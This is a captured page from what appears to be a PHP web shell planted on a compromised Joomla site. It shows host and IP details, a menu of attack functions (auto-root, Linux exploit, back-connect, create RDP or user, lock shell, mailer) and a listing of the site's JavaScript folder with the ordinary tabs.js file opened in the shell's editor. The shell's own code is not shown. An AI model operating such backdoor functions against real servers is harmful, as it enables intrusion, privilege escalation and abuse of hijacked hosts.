Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
media /
system /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
calendar-setup-uncompressed.js
8.75
KB
-rw-r--r--
calendar-setup.js
3.02
KB
-rw-r--r--
calendar-uncompressed.js
47.82
KB
-rw-r--r--
calendar.js
29.38
KB
-rw-r--r--
caption-uncompressed.js
1.31
KB
-rw-r--r--
caption.js
491
B
-rw-r--r--
combobox-uncompressed.js
6.67
KB
-rw-r--r--
combobox.js
3.48
KB
-rw-r--r--
core-uncompressed.js
12.51
KB
-rw-r--r--
core.js
3.96
KB
-rw-r--r--
frontediting-uncompressed.js
6.09
KB
-rw-r--r--
frontediting.js
2.69
KB
-rw-r--r--
helpsite.js
965
B
-rw-r--r--
highlighter-uncompressed.js
3.63
KB
-rw-r--r--
highlighter.js
1.55
KB
-rw-r--r--
html5fallback-uncompressed.js
11.26
KB
-rw-r--r--
html5fallback.js
6.33
KB
-rw-r--r--
jquery.Jcrop.js
41.37
KB
-rw-r--r--
jquery.Jcrop.min.js
15.52
KB
-rw-r--r--
modal-uncompressed.js
13.13
KB
-rw-r--r--
modal.js
9.89
KB
-rw-r--r--
mootools-core-uncompressed.js
147.28
KB
-rw-r--r--
mootools-core.js
81.93
KB
-rw-r--r--
mootools-more-uncompressed.js
340.69
KB
-rw-r--r--
mootools-more.js
231.27
KB
-rw-r--r--
mootree-uncompressed.js
21.39
KB
-rw-r--r--
mootree.js
5.96
KB
-rw-r--r--
multiselect-uncompressed.js
1.33
KB
-rw-r--r--
multiselect.js
431
B
-rw-r--r--
passwordstrength.js
2.27
KB
-rw-r--r--
progressbar-uncompressed.js
2.78
KB
-rw-r--r--
progressbar.js
1.08
KB
-rw-r--r--
punycode-uncompressed.js
13.66
KB
-rw-r--r--
punycode.js
2.61
KB
-rw-r--r--
repeatable-uncompressed.js
16.84
KB
-rw-r--r--
repeatable.js
5.96
KB
-rw-r--r--
switcher-uncompressed.js
2.32
KB
-rw-r--r--
switcher.js
1018
B
-rw-r--r--
tabs-state.js
1.79
KB
-rw-r--r--
tabs.js
2.45
KB
-rw-r--r--
validate-uncompressed.js
6.7
KB
-rw-r--r--
validate.js
2.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tabs.js
/** * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ Object.append(Browser.Features, { localstorage: (function() { return ('localStorage' in window) && window.localStorage !== null; })() }); /** * Tabs behavior * * @package Joomla! * @subpackage JavaScript * @since 1.5 */ var JTabs = new Class({ Implements: [Options, Events], options : { display: 0, useStorage: true, onActive: function(title, description) { description.setStyle('display', 'block'); title.addClass('open').removeClass('closed'); }, onBackground: function(title, description){ description.setStyle('display', 'none'); title.addClass('closed').removeClass('open'); }, titleSelector: 'dt', descriptionSelector: 'dd' }, initialize: function(dlist, options){ this.setOptions(options); this.dlist = document.id(dlist); this.titles = this.dlist.getChildren(this.options.titleSelector); this.descriptions = this.dlist.getChildren(this.options.descriptionSelector); this.content = new Element('div').inject(this.dlist, 'after').addClass('current'); this.storageName = 'jpanetabs_'+this.dlist.id; if (this.options.useStorage) { if (Browser.Features.localstorage) { this.options.display = localStorage[this.storageName]; } else { this.options.display = Cookie.read(this.storageName); } } if (this.options.display === null || this.options.display === undefined) { this.options.display = 0; } this.options.display = this.options.display.toInt().limit(0, this.titles.length-1); for (var i = 0, l = this.titles.length; i < l; i++) { var title = this.titles[i]; var description = this.descriptions[i]; title.setStyle('cursor', 'pointer'); title.addEvent('click', this.display.bind(this, i)); description.inject(this.content); } this.display(this.options.display); if (this.options.initialize) this.options.initialize.call(this); }, hideAllBut: function(but) { for (var i = 0, l = this.titles.length; i < l; i++) { if (i != but) this.fireEvent('onBackground', [this.titles[i], this.descriptions[i]]); } }, display: function(i) { this.hideAllBut(i); this.fireEvent('onActive', [this.titles[i], this.descriptions[i]]); if (this.options.useStorage) { if (Browser.Features.localstorage) { localStorage[this.storageName] = i; } else { Cookie.write(this.storageName, i); } } } });
Close